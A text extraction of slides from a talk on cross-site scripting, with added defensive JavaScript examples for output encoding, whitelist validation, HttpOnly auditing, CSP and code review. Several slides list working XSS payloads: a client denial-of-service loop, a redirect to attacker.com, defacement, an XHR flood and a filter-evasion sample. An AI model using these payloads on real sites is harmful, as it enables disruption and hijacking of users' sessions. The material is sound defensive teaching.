![Page 1: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/1.jpg)
Devouring Security
Insufficient Data Validation Risks
Cross Site Scripting
Marudhamaran Gunasekaran
Watch the screen recording of the presentation at https://vimeo.com/106302349
disclaimer
• Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.
Irrational fear of risks against our children
https://www.schneier.com/blog/archives/2014/08/irrational_fear.html
Perfect security?
http://infosanity.files.wordpress.com/2010/06/dilbert-securitycia.gif
Information Security Triangle
XSS
• Html equivalent of Sql injection? Some say it indeed is.
• "Breaking out of a data context and entering a code context" – Jeff Williams, Chairperson, OWASP
XSS Anatomy
• Benign Input: http://app:8020/odern/AdvSearch?q=xxxxx
  Input: xxxxx | Output: xxxxx
• Malicious Input: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
  Input: <em>xxxxx</em> | Output: <em>xxxxx</em> (the browser treats the tag as markup)
• Malicious Input failure: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
  Input: <em>xxxxx</em> | Output: &lt;em&gt;xxxxx&lt;/em&gt; (the output is HTML-encoded, so the browser shows the tag as text)
XSS Anatomy
• Remember your high school?
  How you used to print a < > symbol on a html page by writing &lt; &gt;
Parsers in Browsers
Html Parser
CSS Parser
JavaScript Parser
XSS
• Breaking out of data context and entering the code context?
• By code context, do I mean?
  • Html markup
  • Html attributes
  • JavaScript
  • CSS (not the XSS CSS, but the Cascading Style Sheet CSS)
  • xml
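The three slides above (the AdvSearch anatomy, the high-school &lt; &gt; trick, and the list of code contexts) all come down to one rule: encode the untrusted value for the context it is written into. The following is an added example, not code from the slides or from any library named on them; the function names and the markup of the stand-in search page are chosen for this example, and only the AdvSearch parameter name q comes from the slides.

```javascript
// Added example (not code from the slides): context-aware output encoding.
// The same untrusted value is rendered as data rather than code when it is
// encoded for the context it lands in: HTML text, HTML attribute, JS string.

// HTML text context: neutralise the characters that can start markup or
// close a quoted attribute.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: encode everything but alphanumerics, so the value
// can never close the attribute or start another one, even if the template
// author forgot the surrounding quotes.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16).toUpperCase()};`);
}

// JavaScript string context (value placed inside a quoted JS literal): hex or
// unicode escape every non-alphanumeric, so neither a quote nor "</script>"
// can end the literal or the script block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    return cp < 0x100
      ? `\\x${cp.toString(16).padStart(2, '0').toUpperCase()}`
      : `\\u{${cp.toString(16).toUpperCase()}}`;
  });
}

// A stand-in for the AdvSearch page on the slides (constructed markup): the
// query string parameter q is echoed in three different contexts.
function renderSearchPage(q) {
  return [
    `<h1>Results for ${encodeForHtml(q)}</h1>`,
    `<input name="q" value="${encodeForHtmlAttribute(q)}">`,
    `<script>var lastQuery = '${encodeForJsString(q)}';</script>`,
  ].join('\n');
}

// Counts literal <script> / </script> tags in the rendered page; only the
// pair written by the template should remain, whatever q contained.
function countScriptTags(html) {
  return (html.match(/<\/?script>/g) || []).length;
}

console.log(renderSearchPage('<em>xxxxx</em>'));
```

With q set to the `<em>xxxxx</em>` input from the anatomy slide, the `<h1>` shows the tag as text (`&lt;em&gt;xxxxx&lt;/em&gt;`), which is the "Malicious Input failure" case. The attribute and JS-string encoders are deliberately stricter than the HTML one, because in those contexts characters other than `<` and `>` (a quote, a line break, a slash) are what let data become code.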
Sources of untrusted data
• Url
• Form data
• Cookies
• Request headers
• External services
• Database
Request["data"]
$_REQUEST
request.getParameter
Demo: XSS 101
• We know <script>alert('xss');</script>
  how about some Samy script?
Samy - http://namb.la/popular/tech.html
Formatted code: http://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss
http://www.zdnet.com/tweetdeck-xss-worm-goes-viral-7000030436/
Auto send FB credentials to the Tunisian government via inserted javascript on non-https connection
XSS Types
• Type 0 – DOM Based
• Type 1 – Reflected or Non-persistent XSS
• Type 2 – Persistent or Stored XSS
Demo: Cookie hijacking and Privilege Escalation
• Face/Off with John Travolta and Nicolas Cage
Demo: Cookie hijacking and Privilege Escalation
• John Travolta – FBI
• Nicolas Cage – Terrorist that planted the bomb.
• Where is the bomb? John Travolta would find it by tricking Nicolas Cage
My fave Payload: Dos the client
<script>var j=0;while(true){++j;setTimeout(function(){var i=0;while(true){++i;setTimeout(function(){var w=0;while(true){w++;}},0);}},0);}</script>
My fave Payload: Redirection
• <script>window.top.location="http://www.attacker.com";</script>
My fave Payload: Defacing
• <script>document.body.background="http://1.bp.blogspot.com/-ISLWH3-kFpo/Uai4UHCOcrI/AAAAAAAAAmA/a6y9Nq3Bk0g/s1600/logo_blue.gif";</script>
My fave Payload: Short XHR
• <script>cn=1;while(true){++cn;var w=window,r=w.XMLHttpRequest,j;if(r)r=new r();else for(j in{"Msxml2":1,"Microsoft":1})try{r=new ActiveXObject(j+".XMLHTTP");break}catch(e){}r.open("GET",document.location,false);r.send("");}</script>
• Better yet... if you have jQuery
  <script>$.get('http://prowarenesssecurity:8000/Pss/c.aspx');</script>
Input Sanitization
• Blacklist
  • Stop anything that starts with a < and is followed by a character
  • Stop any words such as script, javascript, alert, xss
  • Stop the < > " ' characters
• Fails because of elementary evasive techniques like
  <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet (RSnake)
Blacklist vs Whitelist
• Blacklist – Don't allow just the bad things I tell you, the rest is fine
  • What is bad? – anything that is bad today, anything the developer thinks of
• Whitelist – Allow only these, I don't care about the rest
  • What is good? – anything the business requires in the functionality
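To make the blacklist/whitelist contrast concrete, here is an added example (not code from the slides): the blacklist rules described on the Input Sanitization slide, side by side with a per-field whitelist written from the business requirement. The field rules, the field names and the sample inputs are constructed for this example; the `<em>xxxxx</em>` input and the IMG STYLE evasion sample are the ones shown on the slides.

```javascript
// Added example (not code from the slides): the blacklist described on the
// "Input Sanitization" slide next to a whitelist derived from what each field
// is for. Field rules and sample inputs are constructed for this example.

// Blacklist: anything the developer thinks is bad today.
const BLACKLIST = [
  /<[A-Za-z]/,                           // '<' followed by a character
  /\b(script|javascript|alert|xss)\b/i,  // scary words
  /[<>"']/,                              // the characters themselves
];

function blacklistRejects(input) {
  return BLACKLIST.some((re) => re.test(input));
}

// Whitelist: one rule per field, written from the business requirement.
// Anything that does not match is rejected without needing a reason.
const FIELDS = {
  username:    { re: /^[A-Za-z0-9_]{3,20}$/ },
  fullName:    { re: /^[A-Za-z][A-Za-z' .-]{0,59}$/ },
  searchQuery: { re: /^[A-Za-z0-9 .,'-]{1,100}$/ },
  age:         { re: /^\d{1,3}$/, check: (v) => Number(v) <= 150 },
};

function whitelistAccepts(field, input) {
  const rule = FIELDS[field];
  if (!rule) return false;                 // unknown field: nothing is allowed
  if (!rule.re.test(input)) return false;
  return rule.check ? rule.check(input) : true;
}

// Runs both approaches over one field's inputs so the differences are visible.
function compareApproaches(field, inputs) {
  return inputs.map((input) => ({
    input,
    blacklistRejects: blacklistRejects(input),
    whitelistAccepts: whitelistAccepts(field, input),
  }));
}

// Constructed sample inputs for a search box.
const SAMPLE_QUERIES = [
  'javascript tutorial',                                 // legitimate; blacklist false positive
  "Conan O'Brien",                                       // legitimate; blacklist false positive
  '<em>xxxxx</em>',                                      // the markup from the anatomy slide
  '<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">', // the evasion sample from the slide
];

console.table(compareApproaches('searchQuery', SAMPLE_QUERIES));
```

Two things show up in the table. The blacklist rejects perfectly legitimate searches ("javascript tutorial", a name with an apostrophe), so developers get pressure to loosen it, which is how the evasion list on the OWASP cheat sheet keeps growing. The whitelist rejects both the `<em>` markup and the IMG STYLE sample without containing any rule about them. Note that the search-query rule still admits an apostrophe, so whitelisting does not replace output encoding: the value must still be encoded for the context it is written into.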
Don't write your own Input Sanitizers
• http://blog.codinghorror.com/protecting-your-cookies-httponly/
AntiXss libraries
• Microsoft AntiXss
• AntiSamy for .Net, AntiSamy for Java
• Reform for php
Microsoft AntiXss
• InputSanitizer
  • For purifying html input
• Encoder
  • For output encoding
Output encoding libraries
• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
HttpOnly please!
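The cookie-hijacking demo earlier in the deck works because the session cookie is readable from script; the HttpOnly flag is the fix this slide asks for. The following is an added example, not code from the slides: it parses Set-Cookie response headers and reports cookies that lack HttpOnly (and, while there, Secure), and builds a hardened header for a session cookie. The session-name heuristic and the sample headers are constructed for this example.

```javascript
// Added example (not code from the slides): audit Set-Cookie headers for the
// HttpOnly flag (plus Secure/SameSite) and emit a hardened session cookie.
// The sample headers and the session-name heuristic are constructed.

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [k, v] = attr.split('=');
    const key = k.trim().toLowerCase();          // attribute names are case-insensitive
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = (v || '').trim();
  }
  return cookie;
}

// Cookie names that usually carry a session or auth token (constructed list).
const SESSION_NAME_RE = /(sess|sid|auth|token|phpsessid|jsessionid)/i;

function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly: readable through document.cookie');
  if (!c.secure) findings.push('missing Secure: also sent over plain HTTP');
  if (SESSION_NAME_RE.test(c.name) && !c.httpOnly) {
    findings.push('session cookie exposed to script: hijackable by any XSS on the site');
  }
  return { name: c.name, findings };
}

// The header a session cookie should be set with.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample response headers.
const SAMPLE_HEADERS = [
  'ASP.NET_SessionId=abc123; path=/',
  'theme=dark; Path=/; Max-Age=31536000',
  'JSESSIONID=XYZ; Path=/; HttpOnly; Secure',
];

function auditAll(headers = SAMPLE_HEADERS) {
  return headers.map(auditSetCookie);
}

console.log(JSON.stringify(auditAll(), null, 2));
```

HttpOnly does not stop XSS; it only denies an injected script the one thing the cookie-hijacking demo needed, the session identifier. The injected script can still issue requests on the victim's behalf, which is why output encoding and CSP remain necessary.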
Framework protections
• Ruby on Rails, ASP.Net MVC
  • XSS protections by default, by output encoding
• But why don't developers like it? Why do they want to turn the framework protections off?
  • Because they just do not want output encoding by default, because it just does not look right
  • Because they want plain html to be rendered at the UI
• Say hello to ASP.Net MVC's Html.Raw()
Framework Protections – Input validations
• ASP.Net's Request Validation
• Why is it there? When does it get triggered? Could we bypass it? Sure.
  • <httpRuntime requestValidationMode="2.0" />
  • AllowHtml
  • ValidateInput(false)
  • ValidateRequest=false
  • Request.Unvalidated...
Use explicit input validation, or AntiXss libraries, when you have request validation turned off
Browser defenses
• IE
• Chrome
• Safari
• X-XSS-Protection: 1; mode=block
Browser defenses and bypasses
• https://www.sysdream.com/sites/default/files/Abusing_IE8s_XSS_Filters%20(1).pdf
• https://blog.whitehatsec.com/internet-explorer-xss-filter/
• http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-chrome.html
XSS Defences
• NoScript addon
• Content-Security-Policy [No wide browser support yet, especially IE]
Content Security Policy
• 'xxx' is the only domain you should load my Scripts, Styles, Images and Objects from
Content Security Policy
• Blocking mode
• Reporting mode
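The two CSP slides say what the header expresses ("only this domain may serve my scripts, styles, images and objects") and that it can run in blocking or reporting mode. As an added example, not code from the slides, the following builds both forms of the header from one policy object and includes a minimal source matcher so the effect on a given origin can be checked offline. The directive names, the report-uri directive and the two header names are standard CSP; the host names in the policy are constructed, and the matcher handles only host sources ('self', 'none', exact origins, leading wildcards), not nonces, hashes or 'unsafe-inline'.

```javascript
// Added example (not code from the slides): build a Content-Security-Policy
// header in blocking mode or report-only mode, and check whether a given
// origin is allowed by it. Host names are constructed for this example.

function buildCspHeader(directives, { reportOnly = false, reportUri = null } = {}) {
  const parts = Object.entries(directives).map(
    ([name, sources]) => `${name} ${sources.join(' ')}`,
  );
  if (reportUri) parts.push(`report-uri ${reportUri}`);
  return {
    // Report-Only: violations are reported but the resource still loads.
    name: reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy',
    value: parts.join('; '),
  };
}

// Minimal host-source matcher: 'none', 'self', exact origin, or a wildcard
// origin such as https://*.example.test. Inline scripts are not modelled.
function sourceAllows(source, origin, pageOrigin) {
  if (source === "'none'") return false;
  if (source === "'self'") return origin === pageOrigin;
  if (source.includes('*')) {
    const pattern = source.replace(/[.]/g, '\\.').replace(/\*/g, '[^/]+');
    return new RegExp(`^${pattern}$`).test(origin);
  }
  return source === origin;
}

// A directive that is not set falls back to default-src.
function isAllowed(directives, directive, origin, pageOrigin) {
  const sources = directives[directive] || directives['default-src'] || [];
  return sources.some((s) => sourceAllows(s, origin, pageOrigin));
}

// Constructed policy: everything from the site itself, images also from a
// CDN, nothing else anywhere.
const POLICY = {
  'default-src': ["'none'"],
  'script-src': ["'self'"],
  'style-src': ["'self'"],
  'img-src': ["'self'", 'https://*.cdn-example.test'],
  'object-src': ["'none'"],
};

console.log(buildCspHeader(POLICY));
console.log(buildCspHeader(POLICY, { reportOnly: true, reportUri: '/csp-report' }));
```

Rolling out with the Report-Only header first, then switching to the blocking header once the reports stop showing legitimate resources, is the usual way to avoid breaking the site. Note that even with script-src 'self', a reflected payload like the deck's `<script>alert('xss')</script>` is an inline script and is blocked, because inline scripts are not allowed unless the policy says 'unsafe-inline' or carries a matching nonce or hash.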
Tools: Watcher Addon for Fiddler (Passive scanning)
Tools: Xss Me addon for firefox (Active Scanning)
• Demonstration at http://testfire.net/
Tools: Xenotix XSS Exploit Framework
Tools: ModSecurity (Web Application Firewall)
Tools: Zed Attack Proxy
Tools: Commercial tools?
• Go figure, shell out
XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them
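The code-review slides (this one, the Framework Protections slides listing Html.Raw(), AllowHtml, ValidateInput(false), ValidateRequest=false, Request.Unvalidated and requestValidationMode="2.0", and the Code Review Tools slide) all amount to knowing which identifiers to look for. As an added example, not code from the slides or from Cat.Net or Visual Code Grepper, here is a small review helper that runs those patterns over source lines and explains each hit. The rule identifiers, explanations and the sample source lines are constructed for this example; the patterns themselves are the identifiers named on the slides plus an unencoded PHP echo of request data.

```javascript
// Added example (not code from the slides): flag the places in a code base
// where framework XSS protection is switched off or bypassed. The patterns
// are the identifiers named on the slides; sample source is constructed.

const REVIEW_RULES = [
  { id: 'html-raw', re: /\bHtml\.Raw\s*\(/,
    why: 'Razor output encoding bypassed; the value must be sanitized before this point' },
  { id: 'allow-html', re: /\[\s*AllowHtml\s*\]/,
    why: 'request validation disabled for this model property' },
  { id: 'validate-input-false', re: /\bValidateInput\s*\(\s*false\s*\)/,
    why: 'request validation disabled for this action or controller' },
  { id: 'validate-request-false', re: /ValidateRequest\s*=\s*"?false"?/i,
    why: 'request validation disabled for this page' },
  { id: 'request-unvalidated', re: /\bRequest\.Unvalidated\b/,
    why: 'raw request value read without validation' },
  { id: 'request-validation-mode-2.0', re: /requestValidationMode\s*=\s*"2\.0"/,
    why: 'request validation relaxed to ASP.NET 2.0 behaviour (page-level only)' },
  { id: 'php-unencoded-echo', re: /\becho\s+\$_(GET|POST|REQUEST|COOKIE)\b/,
    why: 'request data echoed without htmlentities()' },
];

// Returns one finding per (line, rule) match; line numbers are 1-based.
function reviewSource(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    for (const rule of REVIEW_RULES) {
      if (rule.re.test(line)) {
        findings.push({ line: i + 1, rule: rule.id, why: rule.why, text: line.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample source, mixing Razor, C#, Web.config and PHP lines.
const SAMPLE_SOURCE = [
  '@model ProductViewModel',
  '<h2>@Model.Name</h2>',                                   // encoded by Razor: fine
  '<div class="desc">@Html.Raw(Model.Description)</div>',
  '[AllowHtml]',
  'public string Description { get; set; }',
  '[ValidateInput(false)]',
  'public ActionResult Save(ProductViewModel m) {',
  '    var q = Request.Unvalidated["q"];',
  '<%@ Page ValidateRequest="false" %>',
  '<httpRuntime requestValidationMode="2.0" />',
  'echo htmlentities($name);',                              // encoded: fine
  'echo $_GET["q"];',
];

for (const f of reviewSource(SAMPLE_SOURCE)) {
  console.log(`line ${f.line} [${f.rule}] ${f.why}\n    ${f.text}`);
}
```

A hit is not automatically a bug: Html.Raw() on content that went through AntiSamy is the intended design. The point of the list is that each hit is a place where the framework's default protection is off, so the reviewer has to find the explicit validation or encoding that replaces it, exactly what the Framework Protections slide asks for.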
Output encoding options
• php:
  • echo htmlentities($name)
• ASP.Net code behind:
  • lblName.Text = "Hello, " + HttpUtility.HtmlEncode(txtValue.Text);
  • lblName.Text = "Hello, " + AntiXss.HtmlEncode(txtValue.Text);
• ASPX view engine:
  • <%: data %>
• Razor view engine:
  • @data
Code Review Tools
• Cat.Net still works with a little tweaking on an older code base
• Visual Code Grepper
Popular cheatsheets for XSS prevention
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://opensecurity.in/the-ultimate-xss-protection-cheat-sheet-for-developers/
:q!